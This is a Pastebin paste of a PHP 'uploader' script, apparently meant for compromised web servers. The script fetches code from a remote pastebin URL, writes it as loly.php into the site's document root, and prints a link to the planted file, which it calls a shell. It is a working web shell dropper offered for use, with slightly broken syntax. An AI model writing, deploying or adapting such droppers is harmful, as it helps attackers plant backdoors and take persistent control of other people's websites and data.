Advertisement
Guest User

Uploader Recode By Kyusaku

a guest
Sep 1st, 2019
876
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. <!DOCTYPE HTML>
  2. <html><head>
  3. <title>Script Uploaded !</title>
  4. <center>
  5. </html>
  6. <?php
  7. function http_get($url){
  8. $d7net = curl_init($url);
  9. curl_setopt($d7net, CURLOPT_RETURNTRANSFER, 1);
  10. curl_setopt($d7net, CURLOPT_CONNECTTIMEOUT, 10);
  11. curl_setopt($d7net, CURLOPT_FOLLOWLOCATION, 1);
  12. curl_setopt($d7net, CURLOPT_HEADER, 0);
  13. return curl_exec($d7net);
  14. curl_close($d7net);
  15. }
  16. $check = $_SERVER['DOCUMENT_ROOT'] . "/loly.php" ;
  17. $text = http_get('https://pastebin.com/raw/duN01Efx');
  18. $open = fopen($check, 'w');
  19. fwrite($open, $text);
  20. fclose($open);
  21. if(file_exists($check)){
  22. echo $check."</br>";
  23.  
  24. echo "<br><br>Shell Lu ~> <b><a href='$web/loly.php' target='_blank'>loly.php</b></a>";
  25.  
  26. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement